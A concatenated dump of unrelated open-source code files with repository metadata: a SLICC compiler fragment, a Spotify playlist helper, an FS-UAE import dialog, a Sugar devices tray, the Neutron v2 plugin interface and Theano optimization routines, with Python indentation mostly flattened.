machine.EntryType, "m_cache_entry_ptr", self.pairs)
self.symtab.newSymbol(var)
            # Do not allow returns in actions
code = self.slicc.codeFormatter()
self.statement_list.generate(code, None)
self.pairs["c_code"] = str(code)
self.statement_list.findResources(resources)
self.symtab.popFrame()
action = Action(self.symtab, self.ident, resources, self.location,
self.pairs)
machine.addAction(action)
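# For illustration, a representative SLICC action declaration that this AST node
# corresponds to (a generic sketch, not taken from a specific protocol file); the
# implicit "address", "tbe" and "cache_entry" locals set up in generate() above are
# what make those identifiers usable inside the action body:
#
#   action(i_allocateTBE, "i", desc="Allocate TBE") {
#       TBEs.allocate(address);
#       set_tbe(TBEs[address]);
#   }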
|
bsd-3-clause
|
jcgknudson/spotify-lib
|
common/players/spotify.py
|
1
|
9411
|
# Definition for an API to create a Spotify playlist and check whether a track exists in the service
import sys, os
sys.path.insert(0, os.path.abspath('..'))
import math
import logging
import spotipy
import spotipy.util
from spotipy.oauth2 import SpotifyClientCredentials
class SpotifyPlayer(object):
"""
    Class for interacting with Spotify. Relies on spotipy. Gets a token for a particular
    user, and creates a spotipy instance from this token for user operations.
Uses client credential flow for getting and searching for track ids.
"""
def __init__(self, spfy_user_id, spfy_app_id='', spfy_app_secret=''):
"""
Constructor for the spotify player class
:param spfy_app_id: id of the client application registered with spotify
:param spfy_app_secret: secret of the client application registered with spotify
        :param spfy_user_id: user id whose playlists we want to change
"""
playlist_write_scope = 'playlist-modify-public'
client_credentials_manager = None
auth_spotipy = None
self.user_id=spfy_user_id
#If client id & sceret specified, initialize with the supplied values. Otherwise, assume that they have been
#set as environment variables
if spfy_app_id != '' and spfy_app_secret != '':
client_credentials_manager = SpotifyClientCredentials(spfy_app_id, spfy_app_secret)
auth_spotipy = spotipy.Spotify(auth=spotipy.util.prompt_for_user_token(
spfy_user_id, playlist_write_scope, spfy_app_id, spfy_app_secret))
else:
client_credentials_manager = SpotifyClientCredentials()
auth_spotipy = spotipy.Spotify(auth=spotipy.util.prompt_for_user_token(spfy_user_id, playlist_write_scope))
self.auth_spotipy = auth_spotipy
self.ccm_spotipy = spotipy.Spotify(client_credentials_manager=client_credentials_manager)
def create_playlist(self, playlist_name, description=''):
"""
Creates playlist with the specified name. Description is currently ignored.
"""
logging.debug('creating playlist for user {user}: {playlist} --- {description}'.format(
user=self.user_id, playlist=playlist_name, description=description))
result = None
try:
result = self.auth_spotipy.user_playlist_create(self.user_id, playlist_name)
except:
e = sys.exc_info()[0]
logging.error('error in creating playlist for user {user}: {playlist} --- {description}... error: {error}'.format(
user=self.user_id, playlist=playlist_name, description=description, error=e))
raise
playlist_id = result['id']
logging.debug('created playlist {name} with id {id}'.format(name=playlist_name, id=playlist_id))
return playlist_id
def add_track_ids_to_playlist(self, user_id, playlist_id, track_ids):
"""
Add track ids to specified playlist (spotify can only add 100 at a time)
Adds in batches of batch_size
:param user_id: username of the user who owns the specified playlist
:param playlist_id: playlist to which we're adding tracks
:param track_ids: list of track ids that we're adding to playlist
"""
batch_size = 75
        deduplicated_track_ids = []
        # Try to pre-populate track ids with whatever's already in the playlist
        if self.check_playlist_exists(user_id, playlist_id):
            deduplicated_track_ids = self.get_tracks_in_playlist(user_id, playlist_id)
        for i in track_ids:
            if i not in deduplicated_track_ids:
                deduplicated_track_ids.append(i)
        for i in range(0, math.ceil(len(deduplicated_track_ids) / batch_size)):
            # get current slice of track ids
            max_ind = min(len(deduplicated_track_ids), (i+1)*batch_size)
            logging.debug('Max_index: {}'.format(max_ind))
            track_id_slice = deduplicated_track_ids[i*batch_size:max_ind]
logging.info('Attempting to add {} tracks'.format(len(track_id_slice)))
try:
self.auth_spotipy.user_playlist_add_tracks(user_id, playlist_id, track_id_slice)
except:
e = sys.exc_info()[0]
logging.error('error in adding tracks {tracks} to playlist {playlist} for user {user} :{e}'.format(
tracks=track_id_slice, playlist=playlist_id, user=user_id, e=e))
raise
def get_tracks_in_playlist(self, user_id, playlist_id):
track_ids = []
playlist_tracks = self.auth_spotipy.user_playlist_tracks(user_id, playlist_id=playlist_id)
track_ids = [playlist_track['track']['id'] for playlist_track in playlist_tracks['items']]
return track_ids
def add_tracks_to_playlist_by_name(self, user_id, playlist_id, track_info):
"""
Adds a track to the specified playlist id using track_info as a best-guess
:param track_info: A list of dictionaries containing either 'artist' and 'track' keys or a 'blob'
:param playlist_id: spotify's numerical representation of a particular playlist
"""
track_ids = self.get_track_ids_from_track_info(track_info)
self.add_track_ids_to_playlist(user_id, playlist_id, track_ids)
def get_playlist_id_from_name(self, user_id, playlist_name):
"""
:param playlist_name: friendly name of the playlist
:param user_id: user_id whose playlist we want
"""
if user_id == '':
user_id = self.user_id
playlists = []
try:
playlists = self.auth_spotipy.user_playlists(user_id)
except:
e = sys.exc_info()[0]
logging.error('error in getting playlist {playlist_name} for user {user}: {e}'.format(
user=user_id, playlist_name=playlist_name, e=e))
raise
for playlist in playlists['items']:
if playlist['owner']['id'] == user_id and playlist['name'] == playlist_name:
return playlist['id']
logging.warning('no playlist with name {name} found in {user}\'s account'.format(name=playlist_name,user=user_id))
return None
def check_playlist_exists(self, user_id, playlist_name):
"""
:param user_id: spotify user id
:param playlist_name: the friendly name of the playlist we're checking for
"""
playlist_id = self.get_playlist_id_from_name(user_id, playlist_name)
playlists = []
try:
playlists = self.auth_spotipy.user_playlists(user_id)
except:
e = sys.exc_info()[0]
logging.error('error in getting playlist {playlist_id} for user {user}: {e}'.format(
user=user_id, playlist_id=playlist_id, e=e))
raise
for playlist in playlists['items']:
if playlist['owner']['id'] == user_id and playlist['id'] == playlist_id:
return True
return False
def get_track_ids_from_track_info(self, track_info):
"""
Returns the best guess track id for the supplied track info
:param track_info: A list of dictionaries containing either 'artist' and 'track' keys or a 'blob'
"""
track_ids = []
for track in track_info:
track_id = self.get_track_id_from_track_info(track)
logging.info("retrieved track id {} for {}".format(track_id, track))
track_ids.append(track_id)
return track_ids
def get_track_id_from_track_info(self, track_info):
returned_tracks = None
try:
returned_tracks = self.search_track(track_info)['tracks']['items']
except:
e = sys.exc_info()[0]
logging.error('error in searching for track {track}: {e}'.format(track=track_info, e=e))
raise
if len(returned_tracks) == 0:
logging.warning('Unable to retrieve id for {track}, skipping'.format(track=track_info))
return 0
return returned_tracks[0]['id']
def search_track(self, track_info, limit=1):
"""
Gets list of possible tracks for the supplied track information
:param track_info: A list of dictionaries containing either 'artist' and 'track' keys or a 'blob'
"""
logging.debug('track info {track_info}'.format(track_info=track_info))
query = None
try:
query = '{track} {artist}'.format(track=track_info['track'], artist=track_info['artist'])
except:
query = '{}'.format(track_info['blob'])
logging.info('searching spotify with query {query}'.format(query=query))
try:
retrieved_tracks = self.ccm_spotipy.search(query, limit=limit)
except:
e = sys.exc_info()[0]
logging.error('error in retrieving tracks for {track_info}... error: {error}'.format(
track_info=track_info, error=e))
raise
logging.debug('retrieved tracks {tracks}'.format(tracks=retrieved_tracks))
return retrieved_tracks
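# A hypothetical usage sketch (user id, playlist name and track metadata below are
# placeholders; assumes SPOTIPY_CLIENT_ID, SPOTIPY_CLIENT_SECRET and
# SPOTIPY_REDIRECT_URI are exported so spotipy can complete both auth flows).
if __name__ == '__main__':
    logging.basicConfig(level=logging.INFO)
    player = SpotifyPlayer('some_user_id')
    playlist_id = (player.get_playlist_id_from_name('some_user_id', 'Road Trip')
                   or player.create_playlist('Road Trip'))
    player.add_tracks_to_playlist_by_name('some_user_id', playlist_id, [
        {'artist': 'Daft Punk', 'track': 'Harder, Better, Faster, Stronger'},
        {'blob': 'bohemian rhapsody'},
    ])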
|
mit
|
uhef/fs-uae-gles
|
launcher/fs_uae_launcher/ui/imports/ImportGroup.py
|
2
|
2904
|
from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
from __future__ import unicode_literals
import fs_uae_launcher.fsui as fsui
from ...I18N import _, ngettext
from ...Signal import Signal
from .ImportDialog import ImportDialog
class ImportGroup(fsui.Group):
AMIGA_FOREVER = 1
def __init__(self, parent, type=0):
fsui.Group.__init__(self, parent)
self.type = type
self.layout = fsui.VerticalLayout()
if self.type == self.AMIGA_FOREVER:
title = _("Import From Amiga Forever CD/DVD")
else:
title = _("Import Kickstarts and ROMs")
label = fsui.HeadingLabel(self, title)
self.layout.add(label, margin=10)
icon_layout = fsui.HorizontalLayout()
self.layout.add(icon_layout, fill=True)
icon_layout.add_spacer(20)
if self.type == self.AMIGA_FOREVER:
image = fsui.Image("fs_uae_launcher:res/amiga_forever_group.png")
else:
image = fsui.Image("fs_uae_launcher:res/kickstart.png")
self.image_view = fsui.ImageView(self, image)
icon_layout.add(self.image_view, valign=0.0, margin=10)
vert_layout = fsui.VerticalLayout()
icon_layout.add(vert_layout, fill=True, expand=True)
if self.type == self.AMIGA_FOREVER:
text = _("If you own Amiga Forever, select the drive/folder "
"and click \"{0}\"").format(_("Import"))
else:
text = _("Select a folder containing Amiga kickstart files "
"and click \"{0}\"").format(_("Import"))
label = fsui.Label(self, text)
vert_layout.add(label, margin=10)
hori_layout = fsui.HorizontalLayout()
vert_layout.add(hori_layout, fill=True, margin=10)
self.text_field = fsui.TextField(self, "", read_only=True)
hori_layout.add(self.text_field, expand=True)#, expand=True, fill=True)
self.browse_button = fsui.Button(self, _("Browse"))
self.browse_button.on_activate = self.on_browse
hori_layout.add(self.browse_button, margin_left=10)
self.import_button = fsui.Button(self, _("Import"))
self.import_button.on_activate = self.on_import
self.import_button.disable()
hori_layout.add(self.import_button, margin_left=10)
def set_path(self, path):
self.path = path
self.text_field.set_text(path)
self.import_button.enable()
def on_browse(self):
dialog = fsui.DirDialog(self.get_window(),
_("Select Source Directory"))
if dialog.show_modal():
self.set_path(dialog.get_path())
dialog.destroy()
def on_import(self):
dialog = ImportDialog(self.get_window(), self.path, self.type)
dialog.show_modal()
dialog.destroy()
Signal.broadcast("scan_done")
|
gpl-2.0
|
guarddogofww/cs108test
|
src/jarabe/frame/devicestray.py
|
4
|
1901
|
# Copyright (C) 2008 One Laptop Per Child
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import logging
from sugar3.graphics import tray
from jarabe import config
class DevicesTray(tray.HTray):
def __init__(self):
tray.HTray.__init__(self, align=tray.ALIGN_TO_END)
for f in os.listdir(os.path.join(config.ext_path, 'deviceicon')):
if f.endswith('.py') and not f.startswith('__'):
module_name = f[:-3]
try:
mod = __import__('deviceicon.' + module_name, globals(),
locals(), [module_name])
mod.setup(self)
except Exception:
logging.exception('Exception while loading extension:')
def add_device(self, view):
index = 0
relative_index = getattr(view, 'FRAME_POSITION_RELATIVE', -1)
for item in self.get_children():
current_relative_index = getattr(item, 'FRAME_POSITION_RELATIVE',
0)
if current_relative_index >= relative_index:
index += 1
else:
break
self.add_item(view, index=index)
view.show()
def remove_device(self, view):
self.remove_item(view)
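# A minimal, hypothetical deviceicon extension sketch (file name and icon name are
# placeholders): every module found under <ext_path>/deviceicon only needs a
# setup(tray) entry point, which typically registers its view via add_device().
#
#   # extensions/deviceicon/example.py
#   from sugar3.graphics.tray import TrayIcon
#   def setup(tray):
#       tray.add_device(TrayIcon(icon_name='computer-xo'))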
|
gpl-3.0
|
Juniper/contrail-dev-neutron
|
neutron/neutron_plugin_base_v2.py
|
6
|
13983
|
# Copyright 2011 VMware, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
v2 Neutron Plug-in API specification.
:class:`NeutronPluginBaseV2` provides the definition of minimum set of
methods that needs to be implemented by a v2 Neutron Plug-in.
"""
from abc import ABCMeta, abstractmethod
import six
@six.add_metaclass(ABCMeta)
class NeutronPluginBaseV2(object):
@abstractmethod
def create_subnet(self, context, subnet):
"""Create a subnet.
Create a subnet, which represents a range of IP addresses
that can be allocated to devices
:param context: neutron api request context
:param subnet: dictionary describing the subnet, with keys
as listed in the :obj:`RESOURCE_ATTRIBUTE_MAP` object
in :file:`neutron/api/v2/attributes.py`. All keys will
be populated.
"""
pass
@abstractmethod
def update_subnet(self, context, id, subnet):
"""Update values of a subnet.
:param context: neutron api request context
:param id: UUID representing the subnet to update.
:param subnet: dictionary with keys indicating fields to update.
valid keys are those that have a value of True for
'allow_put' as listed in the
:obj:`RESOURCE_ATTRIBUTE_MAP` object in
:file:`neutron/api/v2/attributes.py`.
"""
pass
@abstractmethod
def get_subnet(self, context, id, fields=None):
"""Retrieve a subnet.
:param context: neutron api request context
:param id: UUID representing the subnet to fetch.
:param fields: a list of strings that are valid keys in a
subnet dictionary as listed in the
:obj:`RESOURCE_ATTRIBUTE_MAP` object in
:file:`neutron/api/v2/attributes.py`. Only these fields
will be returned.
"""
pass
@abstractmethod
def get_subnets(self, context, filters=None, fields=None,
sorts=None, limit=None, marker=None, page_reverse=False):
"""Retrieve a list of subnets.
        The contents of the list depend on
the identity of the user making the request (as indicated by the
context) as well as any filters.
:param context: neutron api request context
:param filters: a dictionary with keys that are valid keys for
a subnet as listed in the :obj:`RESOURCE_ATTRIBUTE_MAP`
object in :file:`neutron/api/v2/attributes.py`.
                        Values in this dictionary are an iterable containing
values that will be used for an exact match comparison
for that value. Each result returned by this
function will have matched one of the values for each
key in filters.
:param fields: a list of strings that are valid keys in a
subnet dictionary as listed in the
:obj:`RESOURCE_ATTRIBUTE_MAP` object in
:file:`neutron/api/v2/attributes.py`. Only these fields
will be returned.
"""
pass
def get_subnets_count(self, context, filters=None):
"""Return the number of subnets.
The result depends on the identity of
the user making the request (as indicated by the context) as well as
any filters.
:param context: neutron api request context
:param filters: a dictionary with keys that are valid keys for
a network as listed in the
:obj:`RESOURCE_ATTRIBUTE_MAP` object in
:file:`neutron/api/v2/attributes.py`. Values in this
                        dictionary are an iterable containing values that
will be used for an exact match comparison for that
value. Each result returned by this function will
have matched one of the values for each key in filters.
.. note:: this method is optional, as it was not part of the originally
defined plugin API.
"""
raise NotImplementedError
@abstractmethod
def delete_subnet(self, context, id):
"""Delete a subnet.
:param context: neutron api request context
:param id: UUID representing the subnet to delete.
"""
pass
@abstractmethod
def create_network(self, context, network):
"""Create a network.
Create a network, which represents an L2 network segment which
can have a set of subnets and ports associated with it.
:param context: neutron api request context
:param network: dictionary describing the network, with keys
as listed in the :obj:`RESOURCE_ATTRIBUTE_MAP` object
in :file:`neutron/api/v2/attributes.py`. All keys will
be populated.
"""
pass
@abstractmethod
def update_network(self, context, id, network):
"""Update values of a network.
:param context: neutron api request context
:param id: UUID representing the network to update.
:param network: dictionary with keys indicating fields to update.
valid keys are those that have a value of True for
'allow_put' as listed in the
:obj:`RESOURCE_ATTRIBUTE_MAP` object in
:file:`neutron/api/v2/attributes.py`.
"""
pass
@abstractmethod
def get_network(self, context, id, fields=None):
"""Retrieve a network.
:param context: neutron api request context
:param id: UUID representing the network to fetch.
:param fields: a list of strings that are valid keys in a
network dictionary as listed in the
:obj:`RESOURCE_ATTRIBUTE_MAP` object in
:file:`neutron/api/v2/attributes.py`. Only these fields
will be returned.
"""
pass
@abstractmethod
def get_networks(self, context, filters=None, fields=None,
sorts=None, limit=None, marker=None, page_reverse=False):
"""Retrieve a list of networks.
        The contents of the list depend on
the identity of the user making the request (as indicated by the
context) as well as any filters.
:param context: neutron api request context
:param filters: a dictionary with keys that are valid keys for
a network as listed in the
:obj:`RESOURCE_ATTRIBUTE_MAP` object in
:file:`neutron/api/v2/attributes.py`. Values in this
                        dictionary are an iterable containing values that will
be used for an exact match comparison for that value.
Each result returned by this function will have matched
one of the values for each key in filters.
:param fields: a list of strings that are valid keys in a
network dictionary as listed in the
:obj:`RESOURCE_ATTRIBUTE_MAP` object in
:file:`neutron/api/v2/attributes.py`. Only these fields
will be returned.
"""
pass
def get_networks_count(self, context, filters=None):
"""Return the number of networks.
The result depends on the identity
of the user making the request (as indicated by the context) as well
as any filters.
:param context: neutron api request context
:param filters: a dictionary with keys that are valid keys for
a network as listed in the
:obj:`RESOURCE_ATTRIBUTE_MAP` object
in :file:`neutron/api/v2/attributes.py`. Values in
                        this dictionary are an iterable containing values that
will be used for an exact match comparison for that
value. Each result returned by this function will have
matched one of the values for each key in filters.
        .. note:: this method is optional, as it was not part of the originally
            defined plugin API.
"""
raise NotImplementedError
@abstractmethod
def delete_network(self, context, id):
"""Delete a network.
:param context: neutron api request context
:param id: UUID representing the network to delete.
"""
pass
@abstractmethod
def create_port(self, context, port):
"""Create a port.
Create a port, which is a connection point of a device (e.g., a VM
NIC) to attach to a L2 neutron network.
:param context: neutron api request context
:param port: dictionary describing the port, with keys as listed in the
:obj:`RESOURCE_ATTRIBUTE_MAP` object in
:file:`neutron/api/v2/attributes.py`. All keys will be
populated.
"""
pass
@abstractmethod
def update_port(self, context, id, port):
"""Update values of a port.
:param context: neutron api request context
:param id: UUID representing the port to update.
:param port: dictionary with keys indicating fields to update.
valid keys are those that have a value of True for
'allow_put' as listed in the :obj:`RESOURCE_ATTRIBUTE_MAP`
object in :file:`neutron/api/v2/attributes.py`.
"""
pass
@abstractmethod
def get_port(self, context, id, fields=None):
"""Retrieve a port.
:param context: neutron api request context
:param id: UUID representing the port to fetch.
:param fields: a list of strings that are valid keys in a port
dictionary as listed in the
:obj:`RESOURCE_ATTRIBUTE_MAP` object in
:file:`neutron/api/v2/attributes.py`. Only these fields
will be returned.
"""
pass
@abstractmethod
def get_ports(self, context, filters=None, fields=None,
sorts=None, limit=None, marker=None, page_reverse=False):
"""Retrieve a list of ports.
        The contents of the list depend on the identity of the user making
the request (as indicated by the context) as well as any filters.
:param context: neutron api request context
:param filters: a dictionary with keys that are valid keys for
a port as listed in the :obj:`RESOURCE_ATTRIBUTE_MAP`
object in :file:`neutron/api/v2/attributes.py`. Values
                        in this dictionary are an iterable containing values
that will be used for an exact match comparison for
that value. Each result returned by this function will
have matched one of the values for each key in filters.
:param fields: a list of strings that are valid keys in a
port dictionary as listed in the
:obj:`RESOURCE_ATTRIBUTE_MAP` object in
:file:`neutron/api/v2/attributes.py`. Only these fields
will be returned.
"""
pass
def get_ports_count(self, context, filters=None):
"""Return the number of ports.
The result depends on the identity of the user making the request
(as indicated by the context) as well as any filters.
:param context: neutron api request context
:param filters: a dictionary with keys that are valid keys for
a network as listed in the
:obj:`RESOURCE_ATTRIBUTE_MAP` object in
:file:`neutron/api/v2/attributes.py`. Values in this
                        dictionary are an iterable containing values that will
be used for an exact match comparison for that value.
Each result returned by this function will have matched
one of the values for each key in filters.
.. note:: this method is optional, as it was not part of the originally
defined plugin API.
"""
raise NotImplementedError
@abstractmethod
def delete_port(self, context, id):
"""Delete a port.
:param context: neutron api request context
:param id: UUID representing the port to delete.
"""
pass
def start_rpc_listener(self):
"""Start the rpc listener.
Most plugins start an RPC listener implicitly on initialization. In
order to support multiple process RPC, the plugin needs to expose
control over when this is started.
.. note:: this method is optional, as it was not part of the originally
defined plugin API.
"""
raise NotImplementedError
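# A minimal, illustrative in-memory plugin sketch (an assumption for illustration, not a
# shipped plugin): a concrete v2 plugin subclasses NeutronPluginBaseV2 and implements
# every abstract method; the optional *_count and start_rpc_listener hooks can be left
# to raise NotImplementedError. Request bodies are assumed to arrive wrapped as
# {'network': {...}}, {'subnet': {...}} and {'port': {...}}; attribute validation,
# policy checks and filtering are omitted here.
import uuid
class InMemoryPluginV2(NeutronPluginBaseV2):
    def __init__(self):
        self._store = {'network': {}, 'subnet': {}, 'port': {}}
    def _create(self, kind, body):
        resource = dict(body[kind], id=uuid.uuid4().hex)
        self._store[kind][resource['id']] = resource
        return resource
    def _update(self, kind, id, body):
        self._store[kind][id].update(body[kind])
        return self._store[kind][id]
    def create_network(self, context, network):
        return self._create('network', network)
    def update_network(self, context, id, network):
        return self._update('network', id, network)
    def get_network(self, context, id, fields=None):
        return self._store['network'][id]
    def get_networks(self, context, filters=None, fields=None,
                     sorts=None, limit=None, marker=None, page_reverse=False):
        return list(self._store['network'].values())
    def delete_network(self, context, id):
        del self._store['network'][id]
    def create_subnet(self, context, subnet):
        return self._create('subnet', subnet)
    def update_subnet(self, context, id, subnet):
        return self._update('subnet', id, subnet)
    def get_subnet(self, context, id, fields=None):
        return self._store['subnet'][id]
    def get_subnets(self, context, filters=None, fields=None,
                    sorts=None, limit=None, marker=None, page_reverse=False):
        return list(self._store['subnet'].values())
    def delete_subnet(self, context, id):
        del self._store['subnet'][id]
    def create_port(self, context, port):
        return self._create('port', port)
    def update_port(self, context, id, port):
        return self._update('port', id, port)
    def get_port(self, context, id, fields=None):
        return self._store['port'][id]
    def get_ports(self, context, filters=None, fields=None,
                  sorts=None, limit=None, marker=None, page_reverse=False):
        return list(self._store['port'].values())
    def delete_port(self, context, id):
        del self._store['port'][id]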
|
apache-2.0
|
taolei87/rcnn
|
code/nn/optimization.py
|
1
|
9054
|
'''
This file implements various optimization methods, including
-- SGD with gradient norm clipping
-- AdaGrad
-- AdaDelta
-- Adam
    Switching between CPU / GPU is transparent.
@author: Tao Lei ([email protected])
'''
import random
from collections import OrderedDict
import numpy as np
import theano
import theano.tensor as T
from theano.sandbox.cuda.basic_ops import HostFromGpu
from theano.sandbox.cuda.var import CudaNdarraySharedVariable
from theano.printing import debugprint
from .initialization import default_mrng
def create_optimization_updates(
cost, params, method="sgd",
max_norm=5, updates=None, gradients=None,
lr=0.01, eps=None, rho=0.99, gamma=0.999,
beta1=0.9, beta2=0.999, momentum=0.0):
_momentum = momentum
lr = theano.shared(np.float64(lr).astype(theano.config.floatX))
rho = theano.shared(np.float64(rho).astype(theano.config.floatX))
beta1 = theano.shared(np.float64(beta1).astype(theano.config.floatX))
beta2 = theano.shared(np.float64(beta2).astype(theano.config.floatX))
momentum = theano.shared(np.float64(momentum).astype(theano.config.floatX))
gamma = theano.shared(np.float64(gamma).astype(theano.config.floatX))
if eps is None:
eps = 1e-8 if method.lower() != "esgd" else 1e-4
eps = np.float64(eps).astype(theano.config.floatX)
gparams = T.grad(cost, params) if gradients is None else gradients
g_norm = 0
for g in gparams:
g_norm = g_norm + g.norm(2)**2
g_norm = T.sqrt(g_norm)
# max_norm is useful for sgd
if method != "sgd": max_norm = None
if max_norm is not None and max_norm is not False:
max_norm = theano.shared(np.float64(max_norm).astype(theano.config.floatX))
shrink_factor = T.minimum(max_norm, g_norm + eps) / (g_norm + eps)
gparams_clipped = [ ]
for g in gparams:
g = shrink_factor * g
gparams_clipped.append(g)
gparams = gparams_clipped
if updates is None:
updates = OrderedDict()
gsums = create_accumulators(params) if method != "sgd" or _momentum > 0.0 else \
[ None for p in params ]
xsums = create_accumulators(params) if method != "sgd" and method != "adagrad" else None
if method == "sgd":
create_sgd_updates(updates, params, gparams, gsums, lr, momentum)
elif method == "adagrad":
create_adagrad_updates(updates, params, gparams, gsums, lr, eps)
elif method == "adadelta":
create_adadelta_updates(updates, params, gparams, gsums, xsums, lr, eps, rho)
elif method == "adam":
create_adam_updates(updates, params, gparams, gsums, xsums, lr, eps, beta1, beta2)
elif method == "esgd":
create_esgd_updates(updates, params, gparams, gsums, xsums, lr, eps, gamma, momentum)
else:
raise Exception("Unknown optim method: {}\n".format(method))
if method == "adadelta":
lr = rho
return updates, lr, g_norm, gsums, xsums, max_norm
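# A hypothetical usage sketch (the toy least-squares model below is an assumption, not
# part of this library): the returned update dict plugs straight into theano.function.
def _example_usage():
    x = T.matrix('x')
    y = T.vector('y')
    w = theano.shared(np.zeros(5, dtype=theano.config.floatX), name='w')
    cost = T.mean((T.dot(x, w) - y) ** 2)
    updates, lr, g_norm, gsums, xsums, max_norm = create_optimization_updates(
            cost, [w], method="adam", lr=0.001)
    return theano.function([x, y], cost, updates=updates)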
def is_subtensor_op(p):
if hasattr(p, 'owner') and hasattr(p.owner, 'op'):
return isinstance(p.owner.op, T.AdvancedSubtensor1) or \
isinstance(p.owner.op, T.Subtensor)
return False
def get_subtensor_op_inputs(p):
origin, indexes = p.owner.inputs
if hasattr(origin, 'owner') and hasattr(origin.owner, 'op') and \
isinstance(origin.owner.op, HostFromGpu):
origin = origin.owner.inputs[0]
assert isinstance(origin, CudaNdarraySharedVariable)
return origin, indexes
def get_similar_subtensor(matrix, indexes, param_op):
'''
    So far there are only two possible subtensor operations used.
'''
if isinstance(param_op.owner.op, T.AdvancedSubtensor1):
return matrix[indexes]
else:
# indexes is start index in this case
return matrix[indexes:]
def create_accumulators(params):
accums = [ ]
for p in params:
if is_subtensor_op(p):
origin, _ = get_subtensor_op_inputs(p)
acc = theano.shared(np.zeros_like(origin.get_value(borrow=True), \
dtype=theano.config.floatX))
else:
acc = theano.shared(np.zeros_like(p.get_value(borrow=True), \
dtype=theano.config.floatX))
accums.append(acc)
return accums
def create_sgd_updates(updates, params, gparams, gsums, lr, momentum):
has_momentum = momentum.get_value() > 0.0
for p, g, acc in zip(params, gparams, gsums):
if is_subtensor_op(p):
origin, indexes = get_subtensor_op_inputs(p)
if has_momentum:
acc_slices = get_similar_subtensor(acc, indexes, p)
new_acc = acc_slices*momentum + g
updates[acc] = T.set_subtensor(acc_slices, new_acc)
else:
new_acc = g
updates[origin] = T.inc_subtensor(p, - lr * new_acc)
else:
if has_momentum:
new_acc = acc*momentum + g
updates[acc] = new_acc
else:
new_acc = g
updates[p] = p - lr * new_acc
def create_adagrad_updates(updates, params, gparams, gsums, lr, eps):
for p, g, acc in zip(params, gparams, gsums):
if is_subtensor_op(p):
origin, indexes = get_subtensor_op_inputs(p)
#acc_slices = acc[indexes]
acc_slices = get_similar_subtensor(acc, indexes, p)
new_acc = acc_slices + g**2
updates[acc] = T.set_subtensor(acc_slices, new_acc)
updates[origin] = T.inc_subtensor(p, \
- lr * (g / T.sqrt(new_acc + eps)))
else:
new_acc = acc + g**2
updates[acc] = new_acc
updates[p] = p - lr * (g / T.sqrt(new_acc + eps))
#updates[p] = p - lr * (g / (T.sqrt(new_acc) + eps))
# which one to use?
def create_adadelta_updates(updates, params, gparams, gsums, xsums,\
lr, eps, rho):
for p, g, gacc, xacc in zip(params, gparams, gsums, xsums):
if is_subtensor_op(p):
origin, indexes = get_subtensor_op_inputs(p)
gacc_slices = gacc[indexes]
xacc_slices = xacc[indexes]
new_gacc = rho * gacc_slices + (1.0-rho) * g**2
d = -T.sqrt((xacc_slices + eps)/(new_gacc + eps)) * g
new_xacc = rho * xacc_slices + (1.0-rho) * d**2
updates[gacc] = T.set_subtensor(gacc_slices, new_gacc)
updates[xacc] = T.set_subtensor(xacc_slices, new_xacc)
updates[origin] = T.inc_subtensor(p, d)
else:
new_gacc = rho * gacc + (1.0-rho) * g**2
d = -T.sqrt((xacc + eps)/(new_gacc + eps)) * g
new_xacc = rho * xacc + (1.0-rho) * d**2
updates[gacc] = new_gacc
updates[xacc] = new_xacc
updates[p] = p + d
def create_adam_updates(updates, params, gparams, gsums, xsums, \
lr, eps, beta1, beta2):
i = theano.shared(np.float64(0.0).astype(theano.config.floatX))
i_t = i + 1.0
omb1_t = 1.0 - beta1**i_t
omb2_t = 1.0 - beta2**i_t
lr_t = lr * (T.sqrt(omb2_t) / omb1_t)
for p, g, m, v in zip(params, gparams, gsums, xsums):
if is_subtensor_op(p):
origin, indexes = get_subtensor_op_inputs(p)
m_sub = m[indexes]
v_sub = v[indexes]
m_t = beta1*m_sub + (1.0-beta1)*g
v_t = beta2*v_sub + (1.0-beta2)*T.sqr(g)
g_t = m_t / (T.sqrt(v_t) + eps)
updates[m] = T.set_subtensor(m_sub, m_t)
updates[v] = T.set_subtensor(v_sub, v_t)
updates[origin] = T.inc_subtensor(p, -lr_t*g_t)
else:
m_t = beta1*m + (1.0-beta1)*g
v_t = beta2*v + (1.0-beta2)*T.sqr(g)
g_t = m_t / (T.sqrt(v_t) + eps)
updates[m] = m_t
updates[v] = v_t
updates[p] = p - lr_t*g_t
updates[i] = i_t
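# For reference, a plain-numpy rendering (an illustration only; not used by the code
# above) of the same bias-corrected Adam step that create_adam_updates expresses with
# theano ops:
def _adam_step_numpy(p, g, m, v, t, lr=0.001, beta1=0.9, beta2=0.999, eps=1e-8):
    m = beta1 * m + (1.0 - beta1) * g
    v = beta2 * v + (1.0 - beta2) * g ** 2
    lr_t = lr * np.sqrt(1.0 - beta2 ** t) / (1.0 - beta1 ** t)
    return p - lr_t * m / (np.sqrt(v) + eps), m, v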
def create_esgd_updates(updates, params, gparams, gsums, xsums, lr, eps, gamma, momentum):
has_momentum = momentum.get_value() > 0.0
samples = [ default_mrng.normal(size=p.shape, avg=0, std=1,
dtype=theano.config.floatX) for p in params ]
HVs = T.Lop(gparams, params, samples)
i = theano.shared(np.float64(0.0).astype(theano.config.floatX))
i_t = i + 1.0
omg_t = 1.0 - gamma**i_t
for p, g, m, D, Hv in zip(params, gparams, gsums, xsums, HVs):
if is_subtensor_op(p):
raise Exception("ESGD subtensor update not implemented!")
else:
D_t = D * gamma + T.sqr(Hv) * (1.0-gamma)
if has_momentum:
m_t = m*momentum + g
updates[m] = m_t
else:
m_t = g
g_t = m_t / ( T.sqrt(D_t/omg_t + eps) )
#g_t = m_t / ( T.sqrt(D_t + eps) )
updates[D] = D_t
updates[p] = p - lr*g_t
updates[i] = i_t
|
apache-2.0
|
jeremiedecock/pyai
|
ailib/mdp/agent/td0.py
|
1
|
